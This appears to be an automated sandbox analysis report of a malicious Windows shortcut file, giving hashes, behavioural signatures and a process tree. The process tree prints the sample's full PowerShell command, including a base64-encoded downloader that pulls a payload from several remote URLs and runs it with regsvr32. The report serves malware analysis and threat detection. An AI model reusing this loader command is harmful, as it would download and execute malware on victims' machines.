Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13-11-2024 09:24
Static task
static1
Behavioral task
behavioral1
Sample
c67871e6e9d3247002b6b15e1f4b1d3b99658f74636e53a8ce205030506ad463.lnk
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
c67871e6e9d3247002b6b15e1f4b1d3b99658f74636e53a8ce205030506ad463.lnk
Resource
win10v2004-20241007-en
General
-
Target
c67871e6e9d3247002b6b15e1f4b1d3b99658f74636e53a8ce205030506ad463.lnk
-
Size
2KB
-
MD5
62a2b911a0cbbbf5d5f5b3219e5104e4
-
SHA1
26eafa71722e807e1e13844456f201d12a75bd72
-
SHA256
c67871e6e9d3247002b6b15e1f4b1d3b99658f74636e53a8ce205030506ad463
-
SHA512
060027a0f5a0ea24c1cc88dafad85dc2ab6f19fdc76a47f3cf168c4085c39538f1dde60049df00d23454f69a90b8ce07ccb0fbca599e793c901046f75f8da543
Malware Config
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid Process 7 1276 powershell.exe 21 1276 powershell.exe 36 1276 powershell.exe 41 1276 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation cmd.exe -
Processes:
powershell.exepowershell.exepid Process 1276 powershell.exe 1628 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid Process 1628 powershell.exe 1628 powershell.exe 1276 powershell.exe 1276 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 1628 powershell.exe Token: SeDebugPrivilege 1276 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exepowershell.exedescription pid Process procid_target PID 2276 wrote to memory of 1628 2276 cmd.exe 86 PID 2276 wrote to memory of 1628 2276 cmd.exe 86 PID 1628 wrote to memory of 1276 1628 powershell.exe 88 PID 1628 wrote to memory of 1276 1628 powershell.exe 88
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\c67871e6e9d3247002b6b15e1f4b1d3b99658f74636e53a8ce205030506ad463.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "ARCHIVO 1512.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovLzUxLjIyMi43Mi4yMzcvd3AtaW5jbHVkZXMvMmw5Mlh1bG5DNmFaenYwak5HTi8iLCJodHRwOi8vdnJzdGFyLXBhcmsuY29tL3dwLWluY2x1ZGVzLzJVWWhOZ0lhTmVJQk0vIiwiaHR0cDovL2RuMDAwODkzLmZlcm96by5jb20vYWdlbmRhL2NrVTRvck9uNC8iLCJodHRwOi8vZGxxc2NsdWIuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy80SW1NWWtnSTQ0cHN3ZWFLSS8iLCJodHRwOi8vdG93YXJkc3VuLm5ldC9hZG1pbi9uNTZ3ZzliU1pQRi8iLCJodHRwOi8vY3JlY2VyY3JlYW5kby5jb20vdGFwYXMyL0FXbG8vIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL21TUm9DeFBJWW4uaGVEO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvbVNSb0N4UElZbi5oZUQ7YnJlYWt9IGNhdGNoIHsgfX0=')) > "C:\Users\Admin\AppData\Local\Temp\vyrEzcdcTl.ps1"; powershell -executionpolicy bypass -file "$env:TEMP/\vyrEzcdcTl.ps1"; Remove-Item "$env:TEMP/\vyrEzcdcTl.2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\Admin\AppData\Local\Temp/\vyrEzcdcTl.ps13⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD50ab03b4ab0ee8273a1eea28cef1ca1e7
SHA18a305ca40e71bd2b04b20c65e28730e3ff3f50b2
SHA256695a48145171a84d61778fe33c410d3195109c7c59a2b1038a1f3ca14c52a3ed
SHA5127347810d3c514b343def26aa42e4b758fc1cdd8a9e57c529de49615b995c8c1dab942d83d432a5ee6e022bbefd020d6b1d920ffa61a9ca2617ff8b67ce3c4f72
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
946B
MD5b6c0d424fc2e8f0305869f276f3ab851
SHA1cc330652aade5fa66cf581884b1a347673206cd0
SHA25670280b341855deaa98065c4548ba8cbbf318a99b288bafa4217c6b205519776c
SHA51221a656692df485e9c678617c6c77c8ea9ab4cef4a214d56f7ff7c5df7b0c484eb4494fb60552746c178875e3ddc66547f2e2eb31d67be8c3745de862bbea4e8e